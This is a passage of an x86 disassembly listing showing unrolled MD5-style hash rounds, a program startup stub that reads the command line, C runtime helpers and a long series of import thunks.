add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB8E
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB8E
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB95
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB95
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB95
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB95
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_446C94
add [edi], eax
mov eax, dword_446C98
add [edi+4], eax
mov eax, dword_446C9C
add [edi+8], eax
mov eax, dword_446CA0
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_40BBC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C410 proc near ; CODE XREF: sub_409847+D90�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_40C410 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C434 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C4FC ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40C468
push 22h
mov eax, edi
inc eax
push eax
call sub_40CA60
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_40C483
mov edi, eax
inc edi
jmp short loc_40C460
; ---------------------------------------------------------------------------
loc_40C45F: ; CODE XREF: sub_40C434+2F�j
inc edi
loc_40C460: ; CODE XREF: sub_40C434+29�j
cmp byte ptr [edi], 20h
jz short loc_40C45F
jmp short loc_40C483
; ---------------------------------------------------------------------------
loc_40C467: ; CODE XREF: sub_40C434+3E�j
inc edi
loc_40C468: ; CODE XREF: sub_40C434+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C474
cmp eax, 20h
jnz short loc_40C467
loc_40C474: ; CODE XREF: sub_40C434+39�j
jmp short loc_40C477
; ---------------------------------------------------------------------------
loc_40C476: ; CODE XREF: sub_40C434+4D�j
inc edi
loc_40C477: ; CODE XREF: sub_40C434:loc_40C474�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C483
cmp eax, 20h
jz short loc_40C476
loc_40C483: ; CODE XREF: sub_40C434+24�j
; sub_40C434+31�j ...
push 0
call sub_40C550 ; GetModuleHandleA
push 1
push edi
push 0
push eax
call sub_40A766
pop edi
leave
retn
sub_40C434 endp
; =============== S U B R O U T I N E =======================================
sub_40C498 proc near ; CODE XREF: sub_401334+8�p
; sub_402A4D+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_40C499: ; CODE XREF: sub_40C498+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_40C499
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_40C498 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40C4B8 proc near ; CODE XREF: sub_401B9A+CA�p
; sub_4053A1+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_40C4B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4E4 proc near ; CODE XREF: sub_40A766+360�p
jmp ds:dword_447374
sub_40C4E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4F0 proc near ; CODE XREF: sub_4062CD+152�p
; sub_408BE4+114�p
jmp ds:dword_447378
sub_40C4F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C4FC proc near ; CODE XREF: sub_40C434+5�p
jmp ds:dword_44737C
sub_40C4FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C508 proc near ; CODE XREF: .text:00401969�p
; sub_401A36+33�p ...
jmp ds:dword_447380
sub_40C508 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C514 proc near ; CODE XREF: sub_401334+29�p
; sub_4015EB+E�p ...
jmp ds:dword_447384
sub_40C514 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C520 proc near ; CODE XREF: sub_401A36+6F�p
; sub_409847+6F7�p
jmp ds:dword_447388
sub_40C520 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C52C proc near ; CODE XREF: sub_40847D+FF�p
jmp ds:dword_44738C
sub_40C52C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C538 proc near ; CODE XREF: sub_401334:loc_4013FF�p
; .text:004019A5�p ...
jmp ds:dword_447390
sub_40C538 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C544 proc near ; CODE XREF: sub_403AA3+148�p
; sub_404194+5E�p ...
jmp ds:dword_447394
sub_40C544 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C550 proc near ; CODE XREF: sub_40223C+13�p
; sub_402572+12B�p ...
jmp ds:dword_447398
sub_40C550 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C55C proc near ; CODE XREF: sub_401334+8F�p
; sub_401A36+C6�p ...
jmp ds:dword_44739C
sub_40C55C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C568 proc near ; CODE XREF: sub_40223C+2B�p
; sub_40223C+40�p ...
jmp ds:dword_4473A0
sub_40C568 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C574 proc near ; CODE XREF: sub_401334+10�p
; sub_401806+7B�p ...
jmp ds:dword_4473A4
sub_40C574 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C580 proc near ; CODE XREF: sub_4039D6+37�p
; sub_404194+DF�p ...
jmp ds:dword_4473A8
sub_40C580 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C58C proc near ; CODE XREF: sub_405601+121�p
; sub_408BE4+18�p
jmp ds:dword_4473AC
sub_40C58C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C598 proc near ; CODE XREF: sub_401806+34�p
; sub_401D14+E8�p ...
jmp ds:dword_4473B0
sub_40C598 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5A4 proc near ; CODE XREF: sub_4015EB:loc_401660�p
; sub_401806+73�p ...
jmp ds:dword_4473B4
sub_40C5A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5B0 proc near ; CODE XREF: sub_404194+97�p
; sub_40A766+F1�p
jmp ds:dword_4473B8
sub_40C5B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5BC proc near ; CODE XREF: sub_4039D6+71�p
jmp ds:dword_4473BC
sub_40C5BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5C8 proc near ; CODE XREF: sub_404194+166�p
; sub_409847+AF5�p ...
jmp ds:dword_4473C0
sub_40C5C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5D4 proc near ; CODE XREF: sub_403449+71�p
; sub_4036F2+55�p ...
jmp ds:dword_4473C4
sub_40C5D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5E0 proc near ; CODE XREF: sub_4034D8+94�p
; .text:00403926�p
jmp ds:dword_4473C8
sub_40C5E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5EC proc near ; CODE XREF: sub_4034D8+74�p
; .text:004038FC�p
jmp ds:dword_4473CC
sub_40C5EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5F8 proc near ; CODE XREF: sub_402A4D+20C�p
jmp ds:dword_4473D0
sub_40C5F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C604 proc near ; CODE XREF: sub_4062CD+461�p
; sub_40A766+2D9�p
jmp ds:dword_4473D4
sub_40C604 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C610 proc near ; CODE XREF: sub_4062CD+4D�p
jmp ds:dword_4473D8
sub_40C610 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C61C proc near ; CODE XREF: sub_402A4D+1CB�p
jmp ds:dword_4473DC
sub_40C61C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C628 proc near ; CODE XREF: sub_402A4D+606�p
jmp ds:dword_4473E0
sub_40C628 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C634 proc near ; CODE XREF: sub_4015EB+9�p
; sub_401806:loc_401831�p ...
jmp ds:dword_4473E4
sub_40C634 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C640 proc near ; CODE XREF: sub_402A4D+B7�p
jmp ds:dword_4473E8
sub_40C640 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C64C proc near ; CODE XREF: sub_401A36+85�p
; sub_40518F+6A�p ...
jmp ds:dword_4473EC
sub_40C64C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C658 proc near ; CODE XREF: sub_40518F+B3�p
; sub_405601+85�p ...
jmp ds:dword_4473F0
sub_40C658 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C664 proc near ; CODE XREF: sub_40A704+25�p
jmp ds:dword_4473F4
sub_40C664 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C670 proc near ; CODE XREF: sub_40518F+25�p
jmp ds:dword_4473F8
sub_40C670 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C67C proc near ; CODE XREF: sub_401334+42�p
; sub_401A36+2C�p ...
jmp ds:dword_4473FC
sub_40C67C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C688 proc near ; CODE XREF: sub_401334+7F�p
; sub_401A36+B2�p
jmp ds:dword_447400
sub_40C688 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C694 proc near ; CODE XREF: sub_40107A+13�p
jmp ds:dword_447404
sub_40C694 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6A0 proc near ; CODE XREF: sub_402A4D+50D�p
; sub_4088D5+6F�p
jmp ds:dword_447408
sub_40C6A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6AC proc near ; CODE XREF: sub_4052EF+5E�p
; sub_408189+1D4�p ...
jmp ds:dword_44740C
sub_40C6AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6B8 proc near ; CODE XREF: sub_40847D+130�p
jmp ds:dword_447410
sub_40C6B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6C4 proc near ; CODE XREF: sub_40A766+528�p
jmp ds:dword_447414
sub_40C6C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6D0 proc near ; CODE XREF: sub_4062CD+373�p
; sub_4062CD+3AD�p
jmp ds:dword_447418
sub_40C6D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6DC proc near ; CODE XREF: sub_4062CD+5A8�p
; sub_408BE4+1EA�p
jmp ds:dword_44741C
sub_40C6DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6E8 proc near ; CODE XREF: sub_4087C3+19�p
jmp ds:dword_447420
sub_40C6E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6F4 proc near ; CODE XREF: sub_4087F1+18�p
jmp ds:dword_447424
sub_40C6F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C700 proc near ; CODE XREF: sub_402A4D+54C�p
jmp ds:dword_447428
sub_40C700 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C70C proc near ; CODE XREF: sub_4062CD+2D6�p
; sub_408BE4+1C3�p
jmp ds:dword_44742C
sub_40C70C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C718 proc near ; CODE XREF: sub_40692E+38�p
jmp ds:dword_447430
sub_40C718 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C724 proc near ; CODE XREF: sub_403AA3+198�p
; sub_404194+2DB�p ...
jmp ds:dword_447434
sub_40C724 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C730 proc near ; CODE XREF: sub_403AA3+111�p
; sub_403C5F+2DF�p ...
jmp ds:dword_447438
sub_40C730 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C73C proc near ; CODE XREF: sub_401B9A+B0�p
; sub_405527+1C�p ...
jmp ds:dword_44743C
sub_40C73C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C748 proc near ; CODE XREF: sub_40692E+17�p
jmp ds:dword_447440
sub_40C748 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C754 proc near ; CODE XREF: sub_40801C+38�p
; sub_40A766+816�p
jmp ds:dword_447444
sub_40C754 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C760 proc near ; CODE XREF: sub_404194+1D8�p
; sub_4062CD+483�p ...
jmp ds:dword_447448
sub_40C760 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C76C proc near ; CODE XREF: sub_4062CD+3CD�p
; sub_406A9A+AB�p ...
jmp ds:dword_447454
sub_40C76C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C778 proc near ; CODE XREF: sub_408E89+6A�p
; sub_40B143+F7�p ...
jmp ds:dword_447458
sub_40C778 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C784 proc near ; CODE XREF: sub_4062CD+353�p
jmp ds:dword_44745C
sub_40C784 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C790 proc near ; CODE XREF: sub_408DEF+19�p
; sub_408DEF+8D�p
jmp ds:dword_447460
sub_40C790 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C79C proc near ; CODE XREF: sub_408DEF+49�p
jmp ds:dword_447464
sub_40C79C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7A8 proc near ; CODE XREF: sub_408E89+9A7�p
; sub_40B01B+47�p ...
jmp ds:dword_447468
sub_40C7A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7B4 proc near ; CODE XREF: sub_406E2B+81�p
jmp ds:dword_44746C
sub_40C7B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7C0 proc near ; CODE XREF: sub_40A766+47A�p
jmp ds:dword_447470
sub_40C7C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7CC proc near ; CODE XREF: sub_40A766+4AA�p
jmp ds:dword_447474
sub_40C7CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7D8 proc near ; CODE XREF: sub_40A766+852�p
jmp ds:dword_447478
sub_40C7D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7E4 proc near ; CODE XREF: sub_40A766+4D8�p
jmp ds:dword_44747C
sub_40C7E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7F0 proc near ; CODE XREF: sub_40B143+3B4�p
; sub_40B143+443�p ...
jmp ds:dword_447480
sub_40C7F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7FC proc near ; CODE XREF: sub_40A766+8A5�p
jmp ds:dword_447484
sub_40C7FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C808 proc near ; CODE XREF: sub_408E89+8AE�p
; sub_408E89+8E9�p ...
jmp ds:dword_447488
sub_40C808 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C814 proc near ; CODE XREF: sub_408E89+8CA�p
; sub_408E89+90B�p ...
jmp ds:dword_44748C
sub_40C814 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C820 proc near ; CODE XREF: sub_40457C�p
jmp ds:dword_447490
sub_40C820 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C82C proc near ; CODE XREF: sub_404586+1E�p
jmp ds:dword_447494
sub_40C82C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C838 proc near ; CODE XREF: sub_404527+27�p
jmp ds:dword_447498
sub_40C838 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C844 proc near ; CODE XREF: sub_40A766+86F�p
jmp ds:dword_44749C
sub_40C844 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C850 proc near ; CODE XREF: sub_40A766+888�p
jmp ds:dword_4474A0
sub_40C850 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C85C proc near ; CODE XREF: sub_408E89+1EE�p
; sub_408E89+32B�p ...
jmp ds:dword_4474A4
sub_40C85C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C868 proc near ; CODE XREF: sub_404FEF+6E�p
; sub_404FEF+E1�p ...
jmp ds:dword_4474A8
sub_40C868 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C874 proc near ; CODE XREF: sub_40B143+220�p
jmp ds:dword_4474AC
sub_40C874 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C880 proc near ; CODE XREF: sub_408E89+58�p
; sub_40B143+873�p
jmp ds:dword_4474B0
sub_40C880 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C88C proc near ; CODE XREF: sub_408E89+AC�p
; sub_408E89+126�p ...
jmp ds:dword_4474B4
sub_40C88C endp
